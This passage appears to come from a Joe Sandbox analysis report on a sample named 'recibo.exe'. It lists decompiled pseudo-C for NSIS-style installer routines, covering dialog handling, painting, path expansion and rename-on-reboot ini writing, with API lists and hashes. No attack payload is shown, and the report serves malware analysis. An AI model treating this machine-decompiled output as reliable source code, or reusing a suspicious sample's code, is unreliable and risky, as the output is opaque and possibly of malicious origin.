                                                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                  								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                                  							}
                                                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                  								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                                  							}
                                                                                  							return 1;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                                  						goto L27;
                                                                                  					} else {
                                                                                  						_t69 =  *0x42c240; // 0x5bcfcc
                                                                                  						_t29 = _t69 + 0x14; // 0x5bcfe0
                                                                                  						_t116 = _t29;
                                                                                  						if(( *_t116 & 0x00000020) == 0) {
                                                                                  							goto L27;
                                                                                  						}
                                                                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                  						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                  						E004048E3();
                                                                                  						goto L13;
                                                                                  					}
                                                                                  				}
                                                                                  				_t117 = _a16;
                                                                                  				_t75 =  *(_t117 + 0x30);
                                                                                  				if(_t75 < 0) {
                                                                                  					_t111 =  *0x433edc; // 0x5c09b6
                                                                                  					_t75 =  *(_t111 - 4 + _t75 * 4);
                                                                                  				}
                                                                                  				_t76 =  *0x434f38 + _t75 * 2;
                                                                                  				_t110 =  *_t76 & 0x0000ffff;
                                                                                  				_a8 = _t110;
                                                                                  				_t78 =  &(_t76[1]);
                                                                                  				_a16 = _t78;
                                                                                  				_v16 = _t78;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = E00404609;
                                                                                  				if(_t110 != 2) {
                                                                                  					_v8 = E004045CF;
                                                                                  				}
                                                                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                  				_push(0x22);
                                                                                  				E00404499(_a4);
                                                                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                  				_push(0x23);
                                                                                  				E00404499(_a4);
                                                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                  				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                  				E004044CE(_t118);
                                                                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                  				_t92 =  *( *0x434f10 + 0x68);
                                                                                  				if(_t92 < 0) {
                                                                                  					_t92 = GetSysColor( ~_t92);
                                                                                  				}
                                                                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                  				 *0x42b234 = 0;
                                                                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                  				 *0x42b234 = 0;
                                                                                  				return 0;
                                                                                  			}




















                                                                                  0x0040469f
                                                                                  0x004046a2
                                                                                  0x004046a5
                                                                                  0x004046a8
                                                                                  0x004046af
                                                                                  0x004046b1
                                                                                  0x004046b1
                                                                                  0x004046bb
                                                                                  0x004046c8
                                                                                  0x004046d2
                                                                                  0x004046d7
                                                                                  0x004046da
                                                                                  0x004046df
                                                                                  0x004046f6
                                                                                  0x004046fd
                                                                                  0x00404710
                                                                                  0x00404713
                                                                                  0x00404727
                                                                                  0x0040472e
                                                                                  0x00404733
                                                                                  0x00404738
                                                                                  0x00404738
                                                                                  0x00404746
                                                                                  0x00404754
                                                                                  0x00404766
                                                                                  0x0040476b
                                                                                  0x0040477b
                                                                                  0x0040477d
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                  • GetSysColor.USER32(?), ref: 00404738
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                  • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                  • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                  • SetCursor.USER32(00000000), ref: 0040485A
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                  • SetCursor.USER32(00000000), ref: 00404876
                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                  • String ID: Call$N
                                                                                  • API String ID: 3103080414-3438112850
                                                                                  • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                  • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                  • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                  • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 90%
                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                  				struct tagLOGBRUSH _v16;
                                                                                  				struct tagRECT _v32;
                                                                                  				struct tagPAINTSTRUCT _v96;
                                                                                  				struct HDC__* _t70;
                                                                                  				struct HBRUSH__* _t87;
                                                                                  				struct HFONT__* _t94;
                                                                                  				long _t102;
                                                                                  				signed int _t126;
                                                                                  				struct HDC__* _t128;
                                                                                  				intOrPtr _t130;
                                                                                  
                                                                                  				if(_a8 == 0xf) {
                                                                                  					_t130 =  *0x434f10;
                                                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                  					_a8 = _t70;
                                                                                  					GetClientRect(_a4,  &_v32);
                                                                                  					_t126 = _v32.bottom;
                                                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                  					while(_v32.top < _t126) {
                                                                                  						_a12 = _t126 - _v32.top;
                                                                                  						asm("cdq");
                                                                                  						asm("cdq");
                                                                                  						asm("cdq");
                                                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                                                  						_v32.bottom = _v32.bottom + 4;
                                                                                  						_a16 = _t87;
                                                                                  						FillRect(_a8,  &_v32, _t87);
                                                                                  						DeleteObject(_a16);
                                                                                  						_v32.top = _v32.top + 4;
                                                                                  					}
                                                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                  						_a16 = _t94;
                                                                                  						if(_t94 != 0) {
                                                                                  							_t128 = _a8;
                                                                                  							_v32.left = 0x10;
                                                                                  							_v32.top = 8;
                                                                                  							SetBkMode(_t128, 1);
                                                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                  							_a8 = SelectObject(_t128, _a16);
                                                                                  							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                                  							SelectObject(_t128, _a8);
                                                                                  							DeleteObject(_a16);
                                                                                  						}
                                                                                  					}
                                                                                  					EndPaint(_a4,  &_v96);
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t102 = _a16;
                                                                                  				if(_a8 == 0x46) {
                                                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                                  				}
                                                                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                  			}














                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                  • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                  • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                  • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406183(void* __ecx) {
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				long _t12;
                                                                                  				long _t24;
                                                                                  				char* _t31;
                                                                                  				int _t37;
                                                                                  				void* _t38;
                                                                                  				intOrPtr* _t39;
                                                                                  				long _t42;
                                                                                  				WCHAR* _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t48;
                                                                                  				void* _t49;
                                                                                  				void* _t52;
                                                                                  				void* _t53;
                                                                                  
                                                                                  				_t38 = __ecx;
                                                                                  				_t44 =  *(_t52 + 0x14);
                                                                                  				 *0x430908 = 0x55004e;
                                                                                  				 *0x43090c = 0x4c;
                                                                                  				if(_t44 == 0) {
                                                                                  					L3:
                                                                                  					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                  						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                                  						_t53 = _t52 + 0x10;
                                                                                  						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                                  						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                                  						_t48 = _t12;
                                                                                  						 *(_t53 + 0x18) = _t48;
                                                                                  						if(_t48 != 0xffffffff) {
                                                                                  							_t42 = GetFileSize(_t48, 0);
                                                                                  							_t6 = _t37 + 0xa; // 0xa
                                                                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                  							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                                  								L18:
                                                                                  								return CloseHandle(_t48);
                                                                                  							} else {
                                                                                  								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                  									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                                  									if(_t49 == 0) {
                                                                                  										_t48 =  *(_t53 + 0x18);
                                                                                  										L16:
                                                                                  										_t24 = _t42;
                                                                                  										L17:
                                                                                  										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                                  										SetFilePointer(_t48, 0, 0, 0);
                                                                                  										E004060DF(_t48, _t46, _t42 + _t37);
                                                                                  										GlobalFree(_t46);
                                                                                  										goto L18;
                                                                                  									}
                                                                                  									_t39 = _t46 + _t42;
                                                                                  									_t31 = _t39 + _t37;
                                                                                  									while(_t39 > _t49) {
                                                                                  										 *_t31 =  *_t39;
                                                                                  										_t31 = _t31 - 1;
                                                                                  										_t39 = _t39 - 1;
                                                                                  									}
                                                                                  									_t24 = _t49 - _t46 + 1;
                                                                                  									_t48 =  *(_t53 + 0x18);
                                                                                  									goto L17;
                                                                                  								}
                                                                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                  								_t42 = _t42 + 0xa;
                                                                                  								goto L16;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				} else {
                                                                                  					CloseHandle(E0040602D(_t44, 0, 1));
                                                                                  					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t12;
                                                                                  			}




















                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                  • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                  • wsprintfA.USER32 ref: 00406202
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                  • API String ID: 2171350718-461813615
                                                                                  • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                  • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                  • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                  • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 72%
                                                                                  			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                  				struct _ITEMIDLIST* _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t44;
                                                                                  				WCHAR* _t45;
                                                                                  				signed char _t47;
                                                                                  				signed int _t48;
                                                                                  				short _t59;
                                                                                  				short _t61;
                                                                                  				short _t63;
                                                                                  				void* _t71;
                                                                                  				signed int _t77;
                                                                                  				signed int _t78;
                                                                                  				short _t81;
                                                                                  				short _t82;
                                                                                  				signed char _t84;
                                                                                  				signed int _t85;
                                                                                  				intOrPtr _t93;
                                                                                  				void* _t98;
                                                                                  				void* _t104;
                                                                                  				intOrPtr* _t105;
                                                                                  				void* _t107;
                                                                                  				WCHAR* _t108;
                                                                                  				void* _t110;
                                                                                  
                                                                                  				_t107 = __esi;
                                                                                  				_t104 = __edi;
                                                                                  				_t71 = __ebx;
                                                                                  				_t44 = _a8;
                                                                                  				if(_t44 < 0) {
                                                                                  					_t93 =  *0x433edc; // 0x5c09b6
                                                                                  					_t44 =  *(_t93 - 4 + _t44 * 4);
                                                                                  				}
                                                                                  				_push(_t71);
                                                                                  				_push(_t107);
                                                                                  				_push(_t104);
                                                                                  				_t105 =  *0x434f38 + _t44 * 2;
                                                                                  				_t45 = 0x432ea0;
                                                                                  				_t108 = 0x432ea0;
                                                                                  				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                                  					_t108 = _a4;
                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                  				}
                                                                                  				_t81 =  *_t105;
                                                                                  				_a8 = _t81;
                                                                                  				if(_t81 == 0) {
                                                                                  					L43:
                                                                                  					 *_t108 =  *_t108 & 0x00000000;
                                                                                  					if(_a4 == 0) {
                                                                                  						return _t45;
                                                                                  					}
                                                                                  					return E0040653D(_a4, _t45);
                                                                                  				} else {
                                                                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                  						_t98 = 2;
                                                                                  						_t105 = _t105 + _t98;
                                                                                  						if(_t81 >= 4) {
                                                                                  							if(__eflags != 0) {
                                                                                  								 *_t108 = _t81;
                                                                                  								_t108 = _t108 + _t98;
                                                                                  								__eflags = _t108;
                                                                                  							} else {
                                                                                  								 *_t108 =  *_t105;
                                                                                  								_t108 = _t108 + _t98;
                                                                                  								_t105 = _t105 + _t98;
                                                                                  							}
                                                                                  							L42:
                                                                                  							_t82 =  *_t105;
                                                                                  							_a8 = _t82;
                                                                                  							if(_t82 != 0) {
                                                                                  								_t81 = _a8;
                                                                                  								continue;
                                                                                  							}
                                                                                  							goto L43;
                                                                                  						}
                                                                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                  						_t47 =  *_t105;
                                                                                  						_t48 = _t47 & 0x000000ff;
                                                                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                  						_t85 = _t84 & 0x000000ff;
                                                                                  						_v28 = _t48 | 0x00008000;
                                                                                  						_t77 = 2;
                                                                                  						_v16 = _t85;
                                                                                  						_t105 = _t105 + _t77;
                                                                                  						_v24 = _t48;
                                                                                  						_v20 = _t85 | 0x00008000;
                                                                                  						if(_a8 != _t77) {
                                                                                  							__eflags = _a8 - 3;
                                                                                  							if(_a8 != 3) {
                                                                                  								__eflags = _a8 - 1;
                                                                                  								if(__eflags == 0) {
                                                                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                  									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                  								}
                                                                                  								L38:
                                                                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                  								_t45 = 0x432ea0;
                                                                                  								goto L42;
                                                                                  							}
                                                                                  							_t78 = _v12;
                                                                                  							__eflags = _t78 - 0x1d;
                                                                                  							if(_t78 != 0x1d) {
                                                                                  								__eflags = (_t78 << 0xb) + 0x436000;
                                                                                  								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                                                  							} else {
                                                                                  								E00406484(_t108,  *0x434f08);
                                                                                  							}
                                                                                  							__eflags = _t78 + 0xffffffeb - 7;
                                                                                  							if(__eflags < 0) {
                                                                                  								L29:
                                                                                  								E004067C4(_t108);
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  						if( *0x434f84 != 0) {
                                                                                  							_t77 = 4;
                                                                                  						}
                                                                                  						_t121 = _t48;
                                                                                  						if(_t48 >= 0) {
                                                                                  							__eflags = _t48 - 0x25;
                                                                                  							if(_t48 != 0x25) {
                                                                                  								__eflags = _t48 - 0x24;
                                                                                  								if(_t48 == 0x24) {
                                                                                  									GetWindowsDirectoryW(_t108, 0x400);
                                                                                  									_t77 = 0;
                                                                                  								}
                                                                                  								while(1) {
                                                                                  									__eflags = _t77;
                                                                                  									if(_t77 == 0) {
                                                                                  										goto L26;
                                                                                  									}
                                                                                  									_t59 =  *0x434f04;
                                                                                  									_t77 = _t77 - 1;
                                                                                  									__eflags = _t59;
                                                                                  									if(_t59 == 0) {
                                                                                  										L22:
                                                                                  										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                  										__eflags = _t61;
                                                                                  										if(_t61 != 0) {
                                                                                  											L24:
                                                                                  											 *_t108 =  *_t108 & 0x00000000;
                                                                                  											__eflags =  *_t108;
                                                                                  											continue;
                                                                                  										}
                                                                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                  										_a8 = _t61;
                                                                                  										__imp__CoTaskMemFree(_v8);
                                                                                  										__eflags = _a8;
                                                                                  										if(_a8 != 0) {
                                                                                  											goto L26;
                                                                                  										}
                                                                                  										goto L24;
                                                                                  									}
                                                                                  									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                                  									__eflags = _t63;
                                                                                  									if(_t63 == 0) {
                                                                                  										goto L26;
                                                                                  									}
                                                                                  									goto L22;
                                                                                  								}
                                                                                  								goto L26;
                                                                                  							}
                                                                                  							GetSystemDirectoryW(_t108, 0x400);
                                                                                  							goto L26;
                                                                                  						} else {
                                                                                  							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                  							if( *_t108 != 0) {
                                                                                  								L27:
                                                                                  								if(_v16 == 0x1a) {
                                                                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                  								}
                                                                                  								goto L29;
                                                                                  							}
                                                                                  							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                                  							L26:
                                                                                  							if( *_t108 == 0) {
                                                                                  								goto L29;
                                                                                  							}
                                                                                  							goto L27;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L43;
                                                                                  				}
                                                                                  			}































                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,00000000,004231B5,773423A0), ref: 004066A8
                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000), ref: 00406779
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  • API String ID: 4260037668-2117559163
                                                                                  • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                  • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                  • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                  • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                                  				short _v132;
